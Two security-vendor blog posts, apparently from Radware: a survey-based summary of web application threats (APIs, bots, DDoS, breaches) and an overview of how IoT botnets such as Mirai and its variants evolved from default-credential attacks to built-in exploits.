
To get a better understanding, we researched the current threat landscape and application protection strategies organizations currently take. Contradicting evidence stood out immediately:

  • 90% suffered attacks against their applications
  • One in three shared sensitive data with third parties
  • 33% allowed third parties to create/modify/delete data via APIs
  • 67% believed a hacker can penetrate their network
  • 89% saw web-scraping as a significant threat to their IP
  • 83% run bug bounty programs to find vulnerabilities they miss

There were quite a few threats to application services that were not properly addressed, challenging traditional security approaches. In parallel, the adoption of emerging frameworks and architectures, which rely on numerous integrations with multiple services, adds more complexity and increases the attack surface.

Current Threat Landscape

Last November, OWASP released a new list of top 10 vulnerabilities in web applications. Hackers continue to use injections, XSS, and a few old techniques such as CSRF, RFI/LFI and session hijacking to exploit these vulnerabilities and gain unauthorized access to sensitive information. Protection is becoming more complex as attacks come through trusted sources such as a CDN, encrypted traffic, or APIs of systems and services we integrate with. Bots behave like real users and bypass challenges such as CAPTCHA, IP-based detection and others, making it even harder to secure and optimize the user experience.

[You might also like: WAFs Should Do A  Lot More Against Current Threats Than Covering OWASP Top 10]

Web application security solutions must be smarter and address a broad spectrum of vulnerability exploitation scenarios. On top of protecting the application from these common vulnerabilities, it has to protect APIs and mitigate DoS attacks, manage bot traffic and make a distinction between legitimate bots (search engines for instance) and bad ones like botnets, web-scrapers and more.

DDoS Attacks

63% suffered a denial of service attack against their application. DoS attacks render applications inoperable by exhausting the application resources. Buffer overflow and HTTP floods were the most common types of DoS attacks, and this form of attack is more common in APAC. 36% find HTTP/Layer-7 DDoS as the most difficult attack to mitigate. Half of the organizations take rate-based approaches (such as limiting the number of request from a certain source or simply buying a rate-based DDoS protection solution) which are ineffective once the threshold is exceeded and real users can’t connect.

API Attacks

APIs simplify the architecture and delivery of application services and make digital interactions possible. Unfortunately, they also introduce a wide range of risks and vulnerabilities as a backdoor for hackers to break into networks. Through APIs, data is exchanged in HTTP where both parties receive, process and share information. A third party is theoretically able to insert, modify, delete and retrieve content from applications. This is nothing but an invitation to attack:

  • 62% of respondents did not encrypt data sent via API
  • 70% of respondents did not require authentication
  • 33% allowed third parties to perform actions (GET/ POST / PUT/ DELETE)

Attacks against APIs:

  • 39% Access violations
  • 32% Brute-force
  • 29% Irregular JSON/XML expressions
  • 38% Protocol attacks
  • 31% Denial of service
  • 29% Injections

Bot Attacks

The amount of both good and bad bot traffic is growing. Organizations are forced to increase network capacity and need to be able to precisely tell a friend from a foe so both customer experience and security are maintained. Surprisingly, 98% claimed they can make such a distinction. However, a similar amount sees web-scraping as a significant threat. 87% were impacted by such an attack over the past 12 months, despite a variety of methods companies use to overcome the challenge – CAPTCHA, in-session termination, IP-based detection or even buying a dedicated anti-bot solution.

Impact of Web-scraping:

  • 50% gathered pricing information
  • 43% copied website
  • 42% theft of intellectual property
  • 37% inventory queued/being held by bots
  • 34% inventory held
  • 26% inventory bought out

Data Breaches

Multinational organizations keep close tabs on what kinds of data they collect and share. However, almost every other business (46%) reports having suffered a breach. On average an organization suffers 16.5 breach attempts every year. Most (85%) take between hours and days to discover. Data breaches are the most difficult attack to detect, as well as mitigate, in the eyes of our survey respondents.

How do organizations discover data breaches?

  • 69% Anomaly detection tools/SIEM
  • 51% Darknet monitoring service
  • 45% Information was leaked publicly
  • 27% Ransom demand

IMPACT OF ATTACKS

Negative consequences such as loss of reputation, customer compensation, legal action (more common in EMEA), churn (more common in APAC), stock price drops (more common in AMER) and executives who lose their jobs are quick to follow a successful attack, while the process of repairing the damage of a company’s reputation is long and not always successful. About half admitted having encountered such consequences.

Securing Emerging Application Development Frameworks

The rapidly growing amount of applications and their distribution across multiple environments requires adjustments that lead to variations once a change to the application is needed. It is nearly impossible to deploy and maintain the same security policy efficiently across all environments. Our research shows that ~60% of all applications undergo changes on a weekly basis. How can the security team keep up?

While 93% of organizations use a web application firewall (WAF), only three in ten use a WAF that combines both positive and negative security models for effective application protection.

Technologies Used By DevOps

  • 63% – DevOps and Automation Tools
  • 48% – Containers (3 in 5 use Orchestration)
  • 44% – Serverless / FaaS
  • 37% – Microservers

Among the respondents that used micro-services, one-half rated data protection as the biggest challenge, followed by availability assurance, policy enforcement, authentication, and visibility.

Summary

Is there a notion that organizations are confident? Yes. Is that a false sense of security? Yes. Attacks are constantly evolving and security measures are not foolproof. Having application security tools and processes in place may provide a sense of control but they are likely to be breached or bypassed sooner or later. Another question we are left with is whether senior management is fully aware of the day to day incidents. Rightfully so, they look to their internal teams tasked with application security to manage the issue, but there seems to be a disconnect between their perceptions of the effectiveness of their organizations’ application security strategies and the actual exposure to risk.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Attack Types & VectorsBotnetsSecurity

IoT Botnets on the Rise

October 2, 2018 — by Daniel Smith1

iot_botnets_rise_blog-960x518.jpg

Over the last two years, the criminal community has shifted its focus away from exploit kits as a mean of payload delivery and began focusing on exploiting IoT devices for the purpose of botnet development.

Botnets are all the rage and have become more advanced than the days of Sub7 and Pretty Pack. They possess the capability to target multiple devices on different architectures and infect them with a diverse range of payloads. But why are exploit kits falling out of favor and where is the evolution of botnets going?

Exploit kits in general are prepackaged toolkits that focus on compromising a device with a specific set of exploits. Typically, a victim is directed in a number of different ways to an attack page where the exploit kit will target an application in a browser such as Adobe Flash, Java or Silverlight. Once the victim is compromised by the exploit kit, it will drop and run a malicious payload on the targeted machine. What that payload is depends on the criminal or the person leasing the exploit kit for the day, but today they are mainly used to distribute ransomware or crypto mining payloads.

Exploit kits, a once popular avenue for an attack are now barely used due to the popularity of other attack vectors. Another major reason for the decrease in exploit kits activity is a result of authors abandoning their projects. But why did they abandon their project? Many experts would agree that this was the result of updated browser security and limited availability of undisclosed exploits needed to update their kits.

Unlike IoT devices, Adobe and Java exploits tend to be patched as soon as they become aware of the problem. This is a major challenge for criminals and one that involves a lot of effort and research on the criminals’ behalf. So the attacker is left with a choice. Invest time and research into an undiscovered exploit, or target devices that are rarely maintained patched or updated.

Enter: The IoT Botnet

Today modern botnets are mainly comprised of infected IoT devices such as cameras, routers, DVRs, wearables and other embedded technologies. The evolution in the botnet landscape highlights the security risks from millions of Internet-connected devices configured with default credentials or manufactures who won’t issue updates. Hackers can build enormous botnets consisting of a wide variety of devices and architectures because of this.

In comparison to web browser exploits, IoT devices come with poor security features such as open ports and default credentials. They are also poorly maintained and hardly receive updates. The process of capturing devices for a botnet is a fairly simple task that’s mainly automated. Hackers typically compromise these devices via brute force login. They have also recently evolved to inject exploit via open ports to compromise devices. They leverage these exploits typically after a researcher discloses a vulnerability.

Overall it is an automated process in which a bot is scanning the internet to identify potential targets and sending that information back to a reporting process. If a match is found, the device is exploited with an injection exploit and a malicious payload is downloaded to the device. The payloads downloaded today can vary, but it mainly gives the bot-herder the ability to remotely control the infected device just like a traditional PC botnet.

IoT botnets continue to evolve and they are becoming more versatile. It wasn’t long ago when Mirai reached the 1tbps mark but the process of how it was done has improved, leading many of us in the industry to worry about the next super attack.

[You might also like: The Evolution of IoT Attacks]

Mirai was simply a botnet comprised of infected IoT devices who left telnet open and utilized 61 default credentials found on popular devices. Because the port was left open to the world and users didn’t change their password, the attacker was able to capture a large number of exposed devices.

Before Mirai’s success, there was Gafgyt and Aidra. Both of these are IoT botnets as well. They spread by infecting vulnerable routers with default credentials. These botnets were successful.  In fact, Gafgyt still continues to move in lockstep with Mirai.  However, after the publication of the Mirai source code, the field became over saturated and bot-herders started incorporating patches to prevent other malware and herders from infecting their captured device. This change forced herders to look for a new way of capturing devices.

Shortly after, new Mirai variants started appearing. This time, instead of using default credentials they started incorporating exploits to target vulnerable devices. Attacker Best Buy used a modified variant that leveraged the TR-069 RCE exploit in an attempted to infect hundreds of thousands of Deutsche Telekom routers. Following Best Buy, IoT reaper appeared with borrowed code from Mirai, but this time included the addition of a LUA execution environment so more complex exploits could be leveraged to enslave devices. As a result, IoT reaper came loaded with nine exploits.

Hajime was not as elaborate as IoT reapers but it did combine the default credentials found in the original Mirai sample and the TR-069 Exploit leveraged by Best Buy. The Omni Botnet, another variant of Mirai was found to contain two new exploits targeting Dasan GPON routers. And just recently a Mirai sample was discovered and found to contain 16 exploits, including the Apache Strut vulnerability used against Equifax while the newest variant of Gafgyt was found to contain an exploit targeting SonicWalls Global Management System.

[You might also like: Defending Against the Mirai Botnet]

These two recent discoveries highlight a major change in their targeting strategy. This indicated a shift from targeting consumer devices to unprotected and rarely updated enterprise devices putting more pressure on the industry to ensure devices are updated in a timely manner.

Today we see Botnet development filling the void of Exploit kits as they incorporate more attack vectors and exploits into their deployments.  Keep in mind that it’s not just about the multiple exploits. It also has to do with the speed in which exploitation occurs in the wild.

One of the main reasons we are seeing exploit kits fall out of favor is due to the improved browser security and speed in which the industry patches vulnerabilities targeting Flash, Java and Silverlight. This is not seen in the IoT botnet world where vulnerabilities are rarely patched.

At the end of the day, cybercriminals are following the money by taking the path of least resistance. Exploit kits over the last several years have been deemed high maintenance and hard to maintain due to improved security practices and a diminishing availability of private exploits.

We are also seeing cybercriminals looking to maximize their new efforts and infection rate by targeting insecure or unmaintained IoT devices with a wide variety of payloads ranging from crypto mining and ransomware to denial of service and fraud.

In the recent months, we have also seen a handful of botnets targeting enterprise devices which indicated an intention to move from targeting consumer devices to target enterprise devices that are poorly maintained and rarely updated.

Read: “When the Bots Come Marching In, a Closer Look at Evolving Threats from Botnets, Web Scraping & IoT Zombies”

Download Now